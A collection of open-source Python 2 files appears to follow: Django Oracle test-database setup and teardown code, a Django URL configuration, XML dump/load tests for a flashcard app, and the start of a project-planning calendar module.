TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
self.remember['user'] = self.connection.settings_dict['USER']
self.remember['passwd'] = self.connection.settings_dict['PASSWORD']
cursor = self.connection.cursor()
if self._test_database_create():
try:
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error creating the test database: %s\n" % e)
if not autoclobber:
confirm = raw_input("It appears the test database, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_NAME)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print "Destroying old test database '%s'..." % self.connection.alias
self._execute_test_db_destruction(cursor, parameters, verbosity)
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error recreating the test database: %s\n" % e)
sys.exit(2)
else:
print "Tests cancelled."
sys.exit(1)
if self._test_user_create():
if verbosity >= 1:
print "Creating test user..."
try:
self._create_test_user(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error creating the test user: %s\n" % e)
if not autoclobber:
confirm = raw_input("It appears the test user, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_USER)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print "Destroying old test user..."
self._destroy_test_user(cursor, parameters, verbosity)
if verbosity >= 1:
print "Creating test user..."
self._create_test_user(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error recreating the test user: %s\n" % e)
sys.exit(2)
else:
print "Tests cancelled."
sys.exit(1)
self.connection.settings_dict['TEST_USER'] = self.connection.settings_dict["USER"] = TEST_USER
self.connection.settings_dict["PASSWORD"] = TEST_PASSWD
return self.connection.settings_dict['NAME']
def _destroy_test_db(self, test_database_name, verbosity=1):
"""
        Destroy the test database: remove the test user and the test
        tablespaces created by _create_test_db and restore the original
        connection settings.
"""
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
self.connection.settings_dict["USER"] = self.remember['user']
self.connection.settings_dict["PASSWORD"] = self.remember['passwd']
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
cursor = self.connection.cursor()
time.sleep(1) # To avoid "database is being accessed by other users" errors.
if self._test_user_create():
if verbosity >= 1:
print 'Destroying test user...'
self._destroy_test_user(cursor, parameters, verbosity)
if self._test_database_create():
if verbosity >= 1:
print 'Destroying test database tables...'
self._execute_test_db_destruction(cursor, parameters, verbosity)
self.connection.close()
def _execute_test_db_creation(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_create_test_db(): dbname = %s" % parameters['dbname']
statements = [
"""CREATE TABLESPACE %(tblspace)s
DATAFILE '%(tblspace)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 200M
""",
"""CREATE TEMPORARY TABLESPACE %(tblspace_temp)s
TEMPFILE '%(tblspace_temp)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 100M
""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _create_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_create_test_user(): username = %s" % parameters['user']
statements = [
"""CREATE USER %(user)s
IDENTIFIED BY %(password)s
DEFAULT TABLESPACE %(tblspace)s
TEMPORARY TABLESPACE %(tblspace_temp)s
""",
"""GRANT CONNECT, RESOURCE TO %(user)s""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_test_db_destruction(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_execute_test_db_destruction(): dbname=%s" % parameters['dbname']
statements = [
'DROP TABLESPACE %(tblspace)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
'DROP TABLESPACE %(tblspace_temp)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _destroy_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_destroy_test_user(): user=%s" % parameters['user']
print "Be patient. This can take some time..."
statements = [
'DROP USER %(user)s CASCADE',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_statements(self, cursor, statements, parameters, verbosity):
for template in statements:
stmt = template % parameters
if verbosity >= 2:
print stmt
try:
cursor.execute(stmt)
except Exception, err:
sys.stderr.write("Failed (%s)\n" % (err))
raise
def _test_database_name(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_NAME']:
name = self.connection.settings_dict['TEST_NAME']
        except KeyError:
pass
return name
def _test_database_create(self):
return self.connection.settings_dict.get('TEST_CREATE', True)
def _test_user_create(self):
return self.connection.settings_dict.get('TEST_USER_CREATE', True)
def _test_database_user(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['USER']
try:
if self.connection.settings_dict['TEST_USER']:
name = self.connection.settings_dict['TEST_USER']
except KeyError:
pass
return name
def _test_database_passwd(self):
name = PASSWORD
try:
if self.connection.settings_dict['TEST_PASSWD']:
name = self.connection.settings_dict['TEST_PASSWD']
except KeyError:
pass
return name
def _test_database_tblspace(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_TBLSPACE']:
name = self.connection.settings_dict['TEST_TBLSPACE']
except KeyError:
pass
return name
def _test_database_tblspace_tmp(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME'] + '_temp'
try:
if self.connection.settings_dict['TEST_TBLSPACE_TMP']:
name = self.connection.settings_dict['TEST_TBLSPACE_TMP']
except KeyError:
pass
return name
|
bsd-3-clause
|
progdupeupl/pdp_website
|
pdp/messages/urls.py
|
1
|
1131
|
# coding: utf-8
#
# This file is part of Progdupeupl.
#
# Progdupeupl is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Progdupeupl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Progdupeupl. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from pdp.messages import views
urlpatterns = patterns(
'',
# Viewing a thread
url(r'^nouveau$', views.new),
url(r'^editer$', views.edit),
url(r'^(?P<topic_pk>\d+)/(?P<topic_slug>.+)$', views.topic),
# Message-related
url(r'^message/editer$', views.edit_post),
url(r'^message/nouveau$', views.answer),
# Home
url(r'^$', views.index),
)
|
agpl-3.0
|
sycy600/pamietacz
|
src/pamietacz/tests/dump_load_tests.py
|
1
|
12140
|
from django.core.files.uploadedfile import SimpleUploadedFile
from pamietacz.models import Shelf, Deck, Card
from test_utils import (add_shelf,
add_deck,
add_card,
TransactionTestCaseWithAuthentication)
class DumpLoadTests(TransactionTestCaseWithAuthentication):
def test_dump_and_load(self):
# Add shelves.
add_shelf(self.client, "1st shelf")
add_shelf(self.client, "2nd shelf><\"&")
add_shelf(self.client, "3rd shelf")
# Add decks.
all_shelves = Shelf.objects.all()
first_shelf = all_shelves[0]
add_deck(self.client, first_shelf.id, "1st shelf 1st deck><\"&")
add_deck(self.client, first_shelf.id, "1st shelf 2nd deck")
# Add some cards.
all_decks = Deck.objects.all()
first_shelf_first_deck = all_decks[0]
add_card(self.client, first_shelf_first_deck.id,
"1st deck 1st question><",
"1st deck 1st answer><\"&")
first_shelf_second_deck = all_decks[1]
add_card(self.client, first_shelf_second_deck.id,
"2nd deck 1st question",
"2nd deck 1st answer")
add_card(self.client, first_shelf_second_deck.id,
"2nd deck 2nd question",
"2nd deck 2nd answer")
all_cards = Card.objects.all()
# Check the number of added shelves, decks and cards.
self.assertEqual(len(all_cards), 3)
self.assertEqual(len(all_shelves), 3)
self.assertEqual(len(all_decks), 2)
# Remember shelves for next checks.
first_shelf = all_shelves[0]
second_shelf = all_shelves[1]
third_shelf = all_shelves[2]
# Remember decks for next checks.
first_shelf_first_deck = all_decks[0]
first_shelf_second_deck = all_decks[1]
# Remember questions for next checks.
first_deck_first_question = all_cards[0].question
first_deck_first_answer = all_cards[0].answer
second_deck_first_question = all_cards[1].question
second_deck_first_answer = all_cards[1].answer
second_deck_second_question = all_cards[2].question
second_deck_second_answer = all_cards[2].answer
# Check if correct XML file was generated.
r = self.client.get("/data/dump/")
c = ("""<?xml version='1.0' encoding='UTF-8'?>\n"""
"""<data>\n"""
""" <shelf name="1st shelf">\n"""
""" <deck name="1st shelf 1st deck><"&">\n"""
""" <card>\n"""
""" <question>1st deck 1st question><</question>\n"""
""" <answer>1st deck 1st answer><"&</answer>\n"""
""" </card>\n"""
""" </deck>\n"""
""" <deck name="1st shelf 2nd deck">\n"""
""" <card>\n"""
""" <question>2nd deck 1st question</question>\n"""
""" <answer>2nd deck 1st answer</answer>\n"""
""" </card>\n"""
""" <card>\n"""
""" <question>2nd deck 2nd question</question>\n"""
""" <answer>2nd deck 2nd answer</answer>\n"""
""" </card>\n"""
""" </deck>\n"""
""" </shelf>\n"""
""" <shelf name="2nd shelf><"&"/>\n"""
""" <shelf name="3rd shelf"/>\n"""
"""</data>\n""")
self.assertEqual(c, r.content)
self.assertEqual(200, r.status_code)
# Delete all shelves (with all decks and cards) from database.
shelves = Shelf.objects.all()
for shelf in shelves:
self.client.get("/shelf/%d/delete/" % shelf.id)
# Check if all cards were deleted.
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
# Load data from XML file back to database.
sent_file = SimpleUploadedFile("dump_data.xml", r.content)
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
all_shelves = Shelf.objects.all()
all_decks = Deck.objects.all()
all_cards = Card.objects.all()
# Check number of loaded cards from file.
self.assertEqual(len(all_cards), 3)
self.assertEqual(len(all_shelves), 3)
self.assertEqual(len(all_decks), 2)
# Check if loaded shelves are the same as previously
# located in database.
self.assertEqual(first_shelf, all_shelves[0])
self.assertEqual(second_shelf, all_shelves[1])
self.assertEqual(third_shelf, all_shelves[2])
# Check if loaded decks are the same as previously
# located in database.
self.assertEqual(first_shelf_first_deck, all_decks[0])
self.assertEqual(first_shelf_second_deck, all_decks[1])
# Check if loaded cards are the same as previously
# located in database.
self.assertEqual(first_deck_first_question,
all_cards[0].question)
self.assertEqual(first_deck_first_answer,
all_cards[0].answer)
self.assertEqual(second_deck_first_question,
all_cards[1].question)
self.assertEqual(second_deck_first_answer,
all_cards[1].answer)
self.assertEqual(second_deck_second_question,
all_cards[2].question)
self.assertEqual(second_deck_second_answer,
all_cards[2].answer)
# Check the structure.
# first shelf first deck
self.assertEqual(all_decks[0].shelf, all_shelves[0])
# first shelf second deck
self.assertEqual(all_decks[1].shelf, all_shelves[0])
# first shelf first deck first card
self.assertEqual(all_cards[0].deck, all_decks[0])
# first shelf second deck first card
self.assertEqual(all_cards[1].deck, all_decks[1])
# first shelf second deck second card
self.assertEqual(all_cards[2].deck, all_decks[1])
def test_load_not_xml_file(self):
"""No XML files are allowed."""
sent_file = SimpleUploadedFile("dump_data.xml", "dsfsdfsdfsd")
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: Start tag expected",
r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_load_wrong_encoding_unknown(self):
"""Unknown encoding provided."""
xml_content = "<?xml version='1.0' encoding='aaa-8'?><shelf></shelf>"
sent_file = SimpleUploadedFile("dump_data.xml", xml_content)
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: Unsupported encoding aaa-8",
r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_load_wrong_encoding_not_supported(self):
"""Not supported encoding provided."""
xml_content = "<?xml version='1.0' encoding='ASCII'?><shelf></shelf>"
sent_file = SimpleUploadedFile("dump_data.xml", xml_content)
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: "
"Not supported encoding: ASCII",
r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_load_wrong_root_element_name(self):
"""Root elements is called 'data' and other are refused."""
sent_file = SimpleUploadedFile("dump_data.xml", "<shelllf></shelllf>")
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: 1: shelllf != 'data'",
r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_no_name_for_shelf(self):
"""Shelf must have 'name' attribute."""
sent_file = SimpleUploadedFile("dump_data.xml",
"<data><shelf></shelf></data>")
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: 1: cannot add shelf: "
"pamietacz_shelf.name may not be NULL", r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_shelf_already_exists(self):
"""Shelf with the same name as one which already
is present in database won't be added."""
add_shelf(self.client, "aa")
xml_content = "<data><shelf name=\"aa\"></shelf></data>"
sent_file = SimpleUploadedFile("dump_data.xml", xml_content)
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: 1: cannot add shelf: "
"column name is not unique", r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 1)
self.assertEqual(len(Deck.objects.all()), 0)
def test_partially_wrong_xml_file(self):
"""If XML file is partially wrong then nothing
won't be added at all."""
xml_content = ("<data><shelf name=\"aa\"></shelf>"
"<shelf name=\"bb\"><deck name=\"xx\"><ee></ee></deck>"
"</shelf></data>")
sent_file = SimpleUploadedFile("dump_data.xml", xml_content)
r = self.client.post("/data/load/", {"data_dump_file": sent_file},
follow=True)
self.assertEqual(200, r.status_code)
self.assertIn("Error while parsing XML: 1: ee != 'card'",
r.content)
self.assertEqual(len(Card.objects.all()), 0)
self.assertEqual(len(Shelf.objects.all()), 0)
self.assertEqual(len(Deck.objects.all()), 0)
def test_order_of_decks_is_taken_into_account(self):
"""Order of decks is kept in XML dump so that decks are sorted
by order."""
add_shelf(self.client, "first shelf")
# Add decks.
all_shelves = Shelf.objects.all()
add_deck(self.client, all_shelves[0].id, "first deck")
add_deck(self.client, all_shelves[0].id, "second deck")
all_decks = Deck.objects.all()
        # Move the first deck up.
self.client.get("/deck/%d/move/up/" % all_decks[0].id)
        # The second deck is now listed first and the first deck second.
r = self.client.get("/data/dump/")
c = ("""<?xml version='1.0' encoding='UTF-8'?>\n"""
"""<data>\n"""
""" <shelf name="first shelf">\n"""
""" <deck name="second deck"/>\n"""
""" <deck name="first deck"/>\n"""
""" </shelf>\n"""
"""</data>\n""")
self.assertEqual(c, r.content)
|
bsd-2-clause
|
factorlibre/OCB
|
addons/resource/faces/pcalendar.py
|
433
|
28436
|
#@+leo-ver=4
#@+node:@file pcalendar.py
#@@language python
#@<< Copyright >>
#@+node:<< Copyright >>
############################################################################
# Copyright (C) 2005, 2006, 2007, 2008 by Reithinger GmbH
# [email protected]
#
# This file is part of faces.
#
# faces is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# faces is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
############################################################################
#@-node:<< Copyright >>
#@nl
"""
This module contains all classes and functions for the project plan calendar
"""
#@<< Imports >>
#@+node:<< Imports >>
from string import *
import datetime
import time
import re
import locale
import bisect
import sys
TIME_RANGE_PATTERN = re.compile("(\\d+):(\\d+)\\s*-\\s*(\\d+):(\\d+)")
TIME_DELTA_PATTERN = re.compile("([-+]?\\d+(\\.\\d+)?)([dwmyMH])")
DEFAULT_MINIMUM_TIME_UNIT = 15
DEFAULT_WORKING_DAYS_PER_WEEK = 5
DEFAULT_WORKING_DAYS_PER_MONTH = 20
DEFAULT_WORKING_DAYS_PER_YEAR = 200
DEFAULT_WORKING_HOURS_PER_DAY = 8
DEFAULT_WORKING_TIMES = ( (8 * 60, 12 * 60 ),
(13 * 60, 17 * 60 ) )
DEFAULT_WORKING_DAYS = { 0 : DEFAULT_WORKING_TIMES,
1 : DEFAULT_WORKING_TIMES,
2 : DEFAULT_WORKING_TIMES,
3 : DEFAULT_WORKING_TIMES,
4 : DEFAULT_WORKING_TIMES,
5 : (),
6 : () }
#@-node:<< Imports >>
#@nl
#@+others
#@+node:to_time_range
def to_time_range(src):
"""
    converts a string to a time range, i.e. a tuple
    (from, to)
    where from and to are ints specifying the minutes since midnight
"""
if not src: return ()
mo = TIME_RANGE_PATTERN.match(src)
if not mo:
raise ValueError("%s is no time range" % src)
from_time = int(mo.group(1)) * 60 + int(mo.group(2))
to_time = int(mo.group(3)) * 60 + int(mo.group(4))
return from_time, to_time
#@-node:to_time_range
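# Illustrative call (not part of the original module):
#   to_time_range("8:00 - 12:30") == (480, 750)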
#@+node:to_datetime
def to_datetime(src):
"""
a tolerant conversion function to convert different strings
    to a datetime.datetime
"""
    # to get the original value for wrappers
new = getattr(src, "_value", src)
while new is not src:
src = new
new = getattr(src, "_value", src)
if isinstance(src, _WorkingDateBase):
src = src.to_datetime()
if isinstance(src, datetime.datetime):
return src
src = str(src)
formats = [ "%x %H:%M",
"%x",
"%Y-%m-%d %H:%M",
"%y-%m-%d %H:%M",
"%d.%m.%Y %H:%M",
"%d.%m.%y %H:%M",
"%Y%m%d %H:%M",
"%d/%m/%y %H:%M",
"%d/%m/%Y %H:%M",
"%d/%m/%Y",
"%d/%m/%y",
"%Y-%m-%d",
"%y-%m-%d",
"%d.%m.%Y",
"%d.%m.%y",
"%Y%m%d" ]
for f in formats:
try:
conv = time.strptime(src, f)
return datetime.datetime(*conv[0:-3])
except Exception, e:
pass
raise TypeError("'%s' (%s) is not a datetime" % (src, str(type(src))))
#@-node:to_datetime
#@+node:_to_days
def _to_days(src):
"""
    converts a string of the day abbreviations mon, tue, wed,
    thu, fri, sat, sun to a dict with the correct weekday indices.
    For example
    _to_days('mon, tue, thu') results in
{ 0:1, 1:1, 3:1 }
"""
tokens = src.split(",")
result = { }
for t in tokens:
try:
index = { "mon" : 0,
"tue" : 1,
"wed" : 2,
"thu" : 3,
"fri" : 4,
"sat" : 5,
"sun" : 6 } [ lower(t.strip()) ]
result[index] = 1
except:
raise ValueError("%s is not a day" % (t))
return result
#@-node:_to_days
#@+node:_add_to_time_spans
def _add_to_time_spans(src, to_add, is_free):
if not isinstance(to_add, (tuple, list)):
to_add = (to_add,)
tmp = []
for start, end, f in src:
tmp.append((start, True, f))
tmp.append((end, False, f))
for v in to_add:
if isinstance(v, (tuple, list)):
start = to_datetime(v[0])
end = to_datetime(v[1])
else:
start = to_datetime(v)
end = start.replace(hour=0, minute=0) + datetime.timedelta(1)
tmp.append((start, start <= end, is_free))
tmp.append((end, start > end, is_free))
tmp.sort()
# 0: date
# 1: is_start
# 2: is_free
sequence = []
free_count = 0
work_count = 0
last = None
for date, is_start, is_free in tmp:
if is_start:
if is_free:
if not free_count and not work_count:
last = date
free_count += 1
else:
if not work_count:
if free_count: sequence.append((last, date, True))
last = date
work_count += 1
else:
if is_free:
assert(free_count > 0)
free_count -= 1
if not free_count and not work_count:
sequence.append((last, date, True))
else:
assert(work_count > 0)
work_count -= 1
if not work_count: sequence.append((last, date, False))
if free_count: last = date
return tuple(sequence)
#@-node:_add_to_time_spans
#@+node:to_timedelta
def to_timedelta(src, cal=None, is_duration=False):
"""
converts a string to a datetime.timedelta. If cal is specified
    it will be used for getting the working times. If is_duration=True,
working times will not be considered. Valid units are
d for Days
w for Weeks
m for Months
y for Years
H for Hours
M for Minutes
"""
cal = cal or _default_calendar
if isinstance(src, datetime.timedelta):
        return datetime.timedelta(src.days, seconds=src.seconds)
if isinstance(src, (long, int, float)):
src = "%sM" % str(src)
if not isinstance(src, basestring):
raise ValueError("%s is not a duration" % (repr(src)))
src = src.strip()
if is_duration:
d_p_w = 7
d_p_m = 30
d_p_y = 360
d_w_h = 24
else:
d_p_w = cal.working_days_per_week
d_p_m = cal.working_days_per_month
d_p_y = cal.working_days_per_year
d_w_h = cal.working_hours_per_day
def convert_minutes(minutes):
minutes = int(minutes)
hours = minutes / 60
minutes = minutes % 60
days = hours / d_w_h
hours = hours % d_w_h
return [ days, 0, 0, 0, minutes, hours ]
def convert_days(value):
days = int(value)
value -= days
value *= d_w_h
hours = int(value)
value -= hours
value *= 60
minutes = round(value)
return [ days, 0, 0, 0, minutes, hours ]
sum_args = [ 0, 0, 0, 0, 0, 0 ]
split = src.split(" ")
for s in split:
mo = TIME_DELTA_PATTERN.match(s)
if not mo:
raise ValueError(src +
" is not a valid duration: valid"
" units are: d w m y M H")
unit = mo.group(3)
val = float(mo.group(1))
if unit == 'd':
args = convert_days(val)
elif unit == 'w':
args = convert_days(val * d_p_w)
elif unit == 'm':
args = convert_days(val * d_p_m)
elif unit == 'y':
args = convert_days(val * d_p_y)
elif unit == 'M':
args = convert_minutes(val)
elif unit == 'H':
args = convert_minutes(val * 60)
sum_args = [ a + b for a, b in zip(sum_args, args) ]
sum_args = tuple(sum_args)
return datetime.timedelta(*sum_args)
#@-node:to_timedelta
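# Illustrative call, assuming the default calendar's 8 working hours per
# day (not part of the original module):
#   to_timedelta("1d 2H") == datetime.timedelta(days=1, hours=2)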
#@+node:timedelta_to_str
def timedelta_to_str(delta, format, cal=None, is_duration=False):
cal = cal or _default_calendar
if is_duration:
d_p_w = 7
d_p_m = 30
d_p_y = 365
d_w_h = 24
else:
d_p_w = cal.working_days_per_week
d_p_m = cal.working_days_per_month
d_p_y = cal.working_days_per_year
d_w_h = cal.working_hours_per_day
has_years = format.find("%y") > -1
has_minutes = format.find("%M") > -1
has_hours = format.find("%H") > -1 or has_minutes
has_days = format.find("%d") > -1
has_weeks = format.find("%w") > -1
has_months = format.find("%m") > -1
result = format
days = delta.days
d_r = (days, format)
minutes = delta.seconds / 60
def rebase(d_r, cond1, cond2, letter, divisor):
#rebase the days
if not cond1: return d_r
days, result = d_r
if cond2:
val = days / divisor
if not val:
result = re.sub("{[^{]*?%" + letter + "[^}]*?}", "", result)
result = result.replace("%" + letter, str(val))
days %= divisor
else:
result = result.replace("%" + letter,
locale.format("%.2f",
(float(days) / divisor)))
return (days, result)
d_r = rebase(d_r, has_years, has_months or has_weeks or has_days, "y", d_p_y)
d_r = rebase(d_r, has_months, has_weeks or has_days, "m", d_p_m)
d_r = rebase(d_r, has_weeks, has_days, "w", d_p_w)
days, result = d_r
if not has_days:
minutes += days * d_w_h * 60
days = 0
if has_hours:
if not days:
result = re.sub("{[^{]*?%d[^}]*?}", "", result)
result = result.replace("%d", str(days))
else:
result = result.replace("%d",
"%.2f" % (days + float(minutes)
/ (d_w_h * 60)))
if has_hours:
if has_minutes:
val = minutes / 60
if not val:
result = re.sub("{[^{]*?%H[^}]*?}", "", result)
result = result.replace("%H", str(val))
minutes %= 60
else:
result = result.replace("%H", "%.2f" % (float(minutes) / 60))
if not minutes:
result = re.sub("{[^{]*?%M[^}]*?}", "", result)
result = result.replace("%M", str(minutes))
result = result.replace("{", "")
result = result.replace("}", "")
return result.strip()
#@-node:timedelta_to_str
#@+node:strftime
def strftime(dt, format):
"""
an extended version of strftime, that introduces some new
directives:
%IW iso week number
%IY iso year
%IB full month name appropriate to iso week
%ib abbreviated month name appropriate to iso week
%im month as decimal number appropriate to iso week
"""
iso = dt.isocalendar()
if iso[0] != dt.year:
iso_date = dt.replace(day=1, month=1)
format = format \
.replace("%IB", iso_date.strftime("%B"))\
.replace("%ib", iso_date.strftime("%b"))\
.replace("%im", iso_date.strftime("%m"))
else:
format = format \
.replace("%IB", "%B")\
.replace("%ib", "%b")\
.replace("%im", "%m")
format = format \
.replace("%IW", str(iso[1]))\
.replace("%IY", str(iso[0]))\
return dt.strftime(format)
#@-node:strftime
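# Illustrative call (not part of the original module): 2008-12-29 falls in
# ISO week 1 of ISO year 2009, so
#   strftime(datetime.datetime(2008, 12, 29), "%IY-W%IW") == "2009-W1"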
#@+node:union
def union(*calendars):
"""
returns a calendar that unifies all working times
"""
#@ << check arguments >>
#@+node:<< check arguments >>
if len(calendars) == 1:
calendars = calendars[0]
#@nonl
#@-node:<< check arguments >>
#@nl
#@ << intersect vacations >>
#@+node:<< intersect vacations >>
free_time = []
for c in calendars:
for start, end, is_free in c.time_spans:
if is_free:
free_time.append((start, False))
free_time.append((end, True))
count = len(calendars)
open = 0
time_spans = []
free_time.sort()
for date, is_end in free_time:
if is_end:
if open == count:
time_spans.append((start, date, True))
open -= 1
else:
open += 1
start = date
#@-node:<< intersect vacations >>
#@nl
#@ << unify extra worktime >>
#@+node:<< unify extra worktime >>
for c in calendars:
for start, end, is_free in c.time_spans:
if not is_free:
time_spans = _add_to_time_spans(time_spans, start, end)
#@nonl
#@-node:<< unify extra worktime >>
#@nl
#@ << unify working times >>
#@+node:<< unify working times >>
working_times = {}
for d in range(0, 7):
times = []
for c in calendars:
for start, end in c.working_times.get(d, []):
times.append((start, False))
times.append((end, True))
times.sort()
open = 0
ti = []
start = None
for time, is_end in times:
if not is_end:
if not start: start = time
open += 1
else:
open -= 1
if not open:
ti.append((start, time))
start = None
if ti:
working_times[d] = ti
#@-node:<< unify working times >>
#@nl
#@ << create result calendar >>
#@+node:<< create result calendar >>
result = Calendar()
result.working_times = working_times
result.time_spans = time_spans
result._recalc_working_time()
result._build_mapping()
#@nonl
#@-node:<< create result calendar >>
#@nl
return result
#@nonl
#@-node:union
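# An assumed usage sketch (illustrative only, mirroring Calendar.__or__ below):
#
#   early = Calendar()
#   early.set_working_days("mon, tue, wed, thu, fri", "6:00-14:00")
#   late = Calendar()
#   late.set_working_days("mon, tue, wed, thu, fri", "12:00-20:00")
#   both = union(early, late)   # equivalent to: both = early | late
#   # 'both' now treats 6:00-20:00 on weekdays as working time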
#@+node:class _CalendarItem
class _CalendarItem(int):
#@ << class _CalendarItem declarations >>
#@+node:<< class _CalendarItem declarations >>
__slots__ = ()
calendar = None
#@-node:<< class _CalendarItem declarations >>
#@nl
#@ @+others
#@+node:__new__
def __new__(cls, val):
try:
return int.__new__(cls, val)
except OverflowError:
return int.__new__(cls, sys.maxint)
#@-node:__new__
#@+node:round
def round(self, round_up=True):
m_t_u = self.calendar.minimum_time_unit
minutes = int(self)
base = (minutes / m_t_u) * m_t_u
minutes %= m_t_u
round_up = round_up and minutes > 0 or minutes > m_t_u / 2
if round_up: base += m_t_u
return self.__class__(base)
#@-node:round
#@-others
#@-node:class _CalendarItem
#@+node:class _Minutes
class _Minutes(_CalendarItem):
#@ << class _Minutes declarations >>
#@+node:<< class _Minutes declarations >>
__slots__ = ()
STR_FORMAT = "{%dd}{ %HH}{ %MM}"
#@-node:<< class _Minutes declarations >>
#@nl
#@ @+others
#@+node:__new__
def __new__(cls, src=0, is_duration=False):
"""
Converts a timedelta into working minutes.
"""
if isinstance(src, cls) or type(src) is int:
return _CalendarItem.__new__(cls, src)
cal = cls.calendar
if not isinstance(src, datetime.timedelta):
src = to_timedelta(src, cal, is_duration)
d_w_h = is_duration and 24 or cal.working_hours_per_day
src = src.days * d_w_h * 60 + src.seconds / 60
return _CalendarItem.__new__(cls, src)
#@-node:__new__
#@+node:__cmp__
def __cmp__(self, other):
return cmp(int(self), int(self.__class__(other)))
#@-node:__cmp__
#@+node:__add__
def __add__(self, other):
try:
return self.__class__(int(self) + int(self.__class__(other)))
except:
return NotImplemented
#@-node:__add__
#@+node:__sub__
def __sub__(self, other):
try:
return self.__class__(int(self) - int(self.__class__(other)))
except:
return NotImplemented
#@-node:__sub__
#@+node:to_timedelta
def to_timedelta(self, is_duration=False):
d_w_h = is_duration and 24 or self.calendar.working_hours_per_day
minutes = int(self)
hours = minutes / 60
minutes = minutes % 60
days = hours / d_w_h
hours = hours % d_w_h
return datetime.timedelta(days, hours=hours, minutes=minutes)
#@nonl
#@-node:to_timedelta
#@+node:strftime
def strftime(self, format=None, is_duration=False):
td = self.to_timedelta(is_duration)
return timedelta_to_str(td, format or self.STR_FORMAT,
self.calendar, is_duration)
#@nonl
#@-node:strftime
#@-others
#@-node:class _Minutes
#@+node:class _WorkingDateBase
class _WorkingDateBase(_CalendarItem):
"""
A datetime which has only valid values within the
working times of a specific calendar
"""
#@ << class _WorkingDateBase declarations >>
